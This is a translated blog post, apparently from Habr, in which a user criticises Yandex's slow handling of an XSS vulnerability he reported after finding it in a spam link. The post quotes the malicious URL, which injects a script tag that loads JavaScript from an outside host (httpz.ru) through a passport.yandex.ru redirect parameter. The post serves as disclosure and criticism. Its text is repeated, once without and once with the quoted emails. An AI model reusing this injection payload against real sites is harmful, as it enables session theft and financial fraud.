How our favorite Yandex responds to XSS messages
Inspired by yesterday's topic. How did you take my money from the Yandex wallet? Part 3. XSS
A small preface to those who did not read that post. A man stole money from his wallet on Yandex.Money. Understanding all this unpleasant story, the user is convinced that Yandex is not omnipotent and they have a wonderful XSS on the site.
After reading about it, I say softly, I was a little surprised, but not because suddenly XSS was active and suddenly, in such a big company like Yandex ... no, not from this. I was surprised that I personally informed the company about this hole 20 days ago and I was told that the measures apply ASAP.
read more…
')
The link to the hostile script was 100% the same.
My letter to Yandex read:
It all looks like an active XSS - I did not check it myself, but it looks like in structure)
After 2 DAYS, I get a reply from Yandex.
For those who do not know, this is a template excuse that Yandex sends to everyone who complains about spam.
I wrote them again and asked them to open their eyes.
the answer was already more adequate:
This correspondence dates back to October 20th. Ticket number: Ticket # 200910199001067
Forgive me, but for a company that manages other people's money (I mean yandex.money), this attitude towards security matters is simply unacceptable.
PS Separately, I want to say that in spite of everything, I personally have respect for Yandex, because to continue to actively develop in the market, where 95% of similar companies on a global scale have already faded into oblivion - this really deserves respect.
A small preface to those who did not read that post. A man stole money from his wallet on Yandex.Money. Understanding all this unpleasant story, the user is convinced that Yandex is not omnipotent and they have a wonderful XSS on the site.
After reading about it, I say softly, I was a little surprised, but not because suddenly XSS was active and suddenly, in such a big company like Yandex ... no, not from this. I was surprised that I personally informed the company about this hole 20 days ago and I was told that the measures apply ASAP.
read more…
')
The link to the hostile script was 100% the same.
My letter to Yandex read:
SUBJ: Looks like a XSS hole on your site"'
Good evening.
Just came to me spam and when clicking on the link inside the letter, I found
code of this type:
src = 'http: //passport.yandex.ru/passport? mode = mycookie & submode = choice & retpath = http: //slovari.yandex.ru/%22%3CSCRIPT
> type = text / javascript src = http: //httpz.ru/zakazchikgo.js>
It all looks like an active XSS - I did not check it myself, but it looks like in structure)
After 2 DAYS, I get a reply from Yandex.
We did not conduct such mailings and have nothing to do with this action.
These are scammers who are trying to lure you money or take possession
registration data. Please forward this scam letter to us
button "Forward". Do not forget to tick the box “Add original letter to
as an attachment.
For those who do not know, this is a template excuse that Yandex sends to everyone who complains about spam.
I wrote them again and asked them to open their eyes.
the answer was already more adequate:
Hello, Roman!
Sorry, I did not quite understand you and immediately want to apologize for responding
in two days.
This code has been transferred to the security service. They will take action.
Thank you for your letter.
This correspondence dates back to October 20th. Ticket number: Ticket # 200910199001067
Forgive me, but for a company that manages other people's money (I mean yandex.money), this attitude towards security matters is simply unacceptable.
PS Separately, I want to say that in spite of everything, I personally have respect for Yandex, because to continue to actively develop in the market, where 95% of similar companies on a global scale have already faded into oblivion - this really deserves respect.
Source: https://habr.com/ru/post/74896/
All Articles